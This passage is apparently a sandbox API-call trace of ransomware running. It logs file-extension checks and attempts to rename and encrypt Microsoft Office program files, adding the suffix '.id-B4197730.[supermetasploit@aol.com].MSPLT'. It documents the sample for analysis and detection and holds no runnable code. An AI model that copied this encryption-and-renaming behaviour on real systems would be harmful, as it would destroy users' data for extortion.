Office\\root\\client\\AppvIsvStream64.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvstream64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.411] lstrlenW (lpString=".doc") returned 4 [0317.411] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.411] lstrlenW (lpString=".docx") returned 5 [0317.411] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0317.411] lstrlenW (lpString=".pdf") returned 4 [0317.411] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.411] lstrlenW (lpString=".xls") returned 4 [0317.411] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.411] lstrlenW (lpString=".xlsx") returned 5 [0317.464] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0317.464] lstrlenW (lpString=".ppt") returned 4 [0317.464] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString=".zip") returned 4 [0317.464] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.464] lstrlenW (lpString=".rar") returned 4 [0317.464] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.464] lstrlenW (lpString=".bz2") returned 4 [0317.464] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.464] lstrlenW (lpString=".7z") returned 3 [0317.464] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString=".dbf") returned 4 [0317.464] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString=".1cd") returned 4 [0317.464] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString=".jpg") returned 4 [0317.464] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.464] lstrlenW (lpString=".doc") returned 4 [0317.464] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.464] lstrlenW (lpString=".docx") returned 5 [0317.465] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0317.465] lstrlenW (lpString=".pdf") returned 4 [0317.465] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.465] lstrlenW (lpString=".xls") returned 4 [0317.465] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.465] lstrlenW (lpString=".xlsx") returned 5 [0317.465] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0317.465] lstrlenW (lpString=".ppt") returned 4 [0317.465] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.465] lstrlenW (lpString=".zip") returned 4 [0317.465] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.465] lstrlenW (lpString=".rar") returned 4 [0317.465] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.465] lstrlenW (lpString=".bz2") returned 4 [0317.465] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.465] lstrlenW (lpString=".7z") returned 3 [0317.465] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.465] lstrlenW (lpString=".dbf") returned 4 [0317.465] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.465] lstrlenW (lpString=".1cd") returned 4 [0317.465] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.465] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvStream64.dll") returned 65 [0317.465] lstrlenW (lpString=".jpg") returned 4 [0317.465] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.466] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.466] lstrlenW (lpString="AppvIsvSubsystems32.dll") returned 23 [0317.466] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0317.466] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=1761448) returned 1 [0317.466] CloseHandle (hObject=0x528) returned 1 [0317.466] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll")) returned 0x420 [0317.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.467] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0317.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.467] lstrlenW (lpString=".doc") returned 4 [0317.467] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.467] lstrlenW (lpString=".docx") returned 5 [0317.467] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0317.467] lstrlenW (lpString=".pdf") returned 4 [0317.467] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.467] lstrlenW (lpString=".xls") returned 4 [0317.467] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.467] lstrlenW (lpString=".xlsx") returned 5 [0317.467] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0317.467] lstrlenW (lpString=".ppt") returned 4 [0317.468] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString=".zip") returned 4 [0317.468] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString=".rar") returned 4 [0317.468] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString=".bz2") returned 4 [0317.468] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.468] lstrlenW (lpString=".7z") returned 3 [0317.468] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString=".dbf") returned 4 [0317.468] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString=".1cd") returned 4 [0317.468] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString=".jpg") returned 4 [0317.468] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.468] lstrlenW (lpString=".doc") returned 4 [0317.468] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString=".docx") returned 5 [0317.468] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0317.468] lstrlenW (lpString=".pdf") returned 4 [0317.468] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString=".xls") returned 4 [0317.468] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.468] lstrlenW (lpString=".xlsx") returned 5 [0317.468] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0317.469] lstrlenW (lpString=".ppt") returned 4 [0317.469] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.469] lstrlenW (lpString=".zip") returned 4 [0317.469] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.469] lstrlenW (lpString=".rar") returned 4 [0317.469] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.469] lstrlenW (lpString=".bz2") returned 4 [0317.469] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.469] lstrlenW (lpString=".7z") returned 3 [0317.469] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.469] lstrlenW (lpString=".dbf") returned 4 [0317.469] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.469] lstrlenW (lpString=".1cd") returned 4 [0317.469] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.469] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems32.dll") returned 69 [0317.469] lstrlenW (lpString=".jpg") returned 4 [0317.469] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.469] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.469] lstrlenW (lpString="AppvIsvSubsystems64.dll") returned 23 [0317.470] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0317.470] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=2285736) returned 1 [0317.470] CloseHandle (hObject=0x528) returned 1 [0317.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll")) returned 0x420 [0317.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvisvsubsystems64.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0317.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.471] lstrlenW (lpString=".doc") returned 4 [0317.471] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString=".docx") returned 5 [0317.471] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0317.471] lstrlenW (lpString=".pdf") returned 4 [0317.471] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString=".xls") returned 4 [0317.471] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString=".xlsx") returned 5 [0317.471] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0317.471] lstrlenW (lpString=".ppt") returned 4 [0317.471] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.471] lstrlenW (lpString=".zip") returned 4 [0317.471] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString=".rar") returned 4 [0317.471] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.471] lstrlenW (lpString=".bz2") returned 4 [0317.471] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.471] lstrlenW (lpString=".7z") returned 3 [0317.472] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString=".dbf") returned 4 [0317.472] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString=".1cd") returned 4 [0317.472] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString=".jpg") returned 4 [0317.472] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString=".doc") returned 4 [0317.472] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.472] lstrlenW (lpString=".docx") returned 5 [0317.472] lstrcmpiW (lpString1=".docx", lpString2="4.dll") returned -1 [0317.472] lstrlenW (lpString=".pdf") returned 4 [0317.472] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.472] lstrlenW (lpString=".xls") returned 4 [0317.472] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.472] lstrlenW (lpString=".xlsx") returned 5 [0317.472] lstrcmpiW (lpString1=".xlsx", lpString2="4.dll") returned -1 [0317.472] lstrlenW (lpString=".ppt") returned 4 [0317.472] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.472] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.472] lstrlenW (lpString=".zip") returned 4 [0317.472] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.473] lstrlenW (lpString=".rar") returned 4 [0317.473] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.473] lstrlenW (lpString=".bz2") returned 4 [0317.473] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.473] lstrlenW (lpString=".7z") returned 3 [0317.473] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.473] lstrlenW (lpString=".dbf") returned 4 [0317.473] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.473] lstrlenW (lpString=".1cd") returned 4 [0317.473] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0317.473] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppvIsvSubsystems64.dll") returned 69 [0317.473] lstrlenW (lpString=".jpg") returned 4 [0317.473] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0317.473] lstrcmpiW (lpString1=".exe", lpString2=".MSPLT") returned -1 [0317.473] lstrlenW (lpString="AppVLP.exe") returned 10 [0317.473] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0317.475] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=431664) returned 1 [0317.475] CloseHandle (hObject=0x528) returned 1 [0317.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe")) returned 0x220 [0317.475] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.476] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe" (normalized: "c:\\program files\\microsoft office\\root\\client\\appvlp.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.476] lstrlenW (lpString=".doc") returned 4 [0317.476] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0317.476] lstrlenW (lpString=".docx") returned 5 [0317.476] lstrcmpiW (lpString1=".docx", lpString2="P.exe") returned -1 [0317.476] lstrlenW (lpString=".pdf") returned 4 [0317.476] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0317.476] lstrlenW (lpString=".xls") returned 4 [0317.476] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0317.476] lstrlenW (lpString=".xlsx") returned 5 [0317.476] lstrcmpiW (lpString1=".xlsx", lpString2="P.exe") returned -1 [0317.476] lstrlenW (lpString=".ppt") returned 4 [0317.476] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0317.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.476] lstrlenW (lpString=".zip") returned 4 [0317.476] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0317.476] lstrlenW (lpString=".rar") returned 4 [0317.476] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0317.476] lstrlenW (lpString=".bz2") returned 4 [0317.476] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0317.476] lstrlenW (lpString=".7z") returned 3 [0317.476] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0317.476] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.476] lstrlenW (lpString=".dbf") returned 4 [0317.477] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.477] lstrlenW (lpString=".1cd") returned 4 [0317.477] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.477] lstrlenW (lpString=".jpg") returned 4 [0317.477] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.477] lstrlenW (lpString=".doc") returned 4 [0317.477] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0317.477] lstrlenW (lpString=".docx") returned 5 [0317.477] lstrcmpiW (lpString1=".docx", lpString2="P.exe") returned -1 [0317.477] lstrlenW (lpString=".pdf") returned 4 [0317.477] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString=".xls") returned 4 [0317.477] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString=".xlsx") returned 5 [0317.477] lstrcmpiW (lpString1=".xlsx", lpString2="P.exe") returned -1 [0317.477] lstrlenW (lpString=".ppt") returned 4 [0317.477] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.477] lstrlenW (lpString=".zip") returned 4 [0317.477] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString=".rar") returned 4 [0317.477] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0317.477] lstrlenW (lpString=".bz2") returned 4 [0317.477] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0317.477] lstrlenW (lpString=".7z") returned 3 [0317.477] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0317.477] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.478] lstrlenW (lpString=".dbf") returned 4 [0317.478] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0317.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.478] lstrlenW (lpString=".1cd") returned 4 [0317.478] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0317.478] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\AppVLP.exe") returned 56 [0317.478] lstrlenW (lpString=".jpg") returned 4 [0317.478] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0317.478] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0317.478] lstrlenW (lpString="C2R32.dll") returned 9 [0317.478] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x528 [0317.479] GetFileSizeEx (in: hFile=0x528, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=820416) returned 1 [0317.479] CloseHandle (hObject=0x528) returned 1 [0317.484] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll")) returned 0x420 [0317.485] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0317.485] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\c2r32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0317.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 55 [0317.485] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 55 [0317.485] lstrlenW (lpString=".doc") returned 4 [0317.485] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0317.485] lstrlenW (lpString=".docx") returned 5 [0317.485] lstrcmpiW (lpString1=".docx", lpString2="2.dll") returned -1 [0317.485] lstrlenW (lpString=".pdf") returned 4 [0317.485] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0317.485] lstrlenW (lpString=".xls") returned 4 [0317.485] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0317.485] lstrlenW (lpString=".xlsx") returned 5 [0317.485] lstrcmpiW (lpString1=".xlsx", lpString2="2.dll") returned -1 [0317.485] lstrlenW (lpString=".ppt") returned 4 [0317.485] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0317.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 55 [0317.486] lstrlenW (lpString=".zip") returned 4 [0317.486] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0317.486] lstrlenW (lpString=".rar") returned 4 [0317.486] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0317.486] lstrlenW (lpString=".bz2") returned 4 [0317.486] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0317.486] lstrlenW (lpString=".7z") returned 3 [0317.486] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0317.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\client\\C2R32.dll") returned 55 [0317.486] lstrlenW (lpString=".dbf") returned 4 [0317.486] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0317.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\client\\mfc140u.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\client\\mfc140u.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0 [0319.075] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.075] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.075] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0319.077] GetLastError () returned 0x0 [0319.077] ReadFile (in: hFile=0x520, 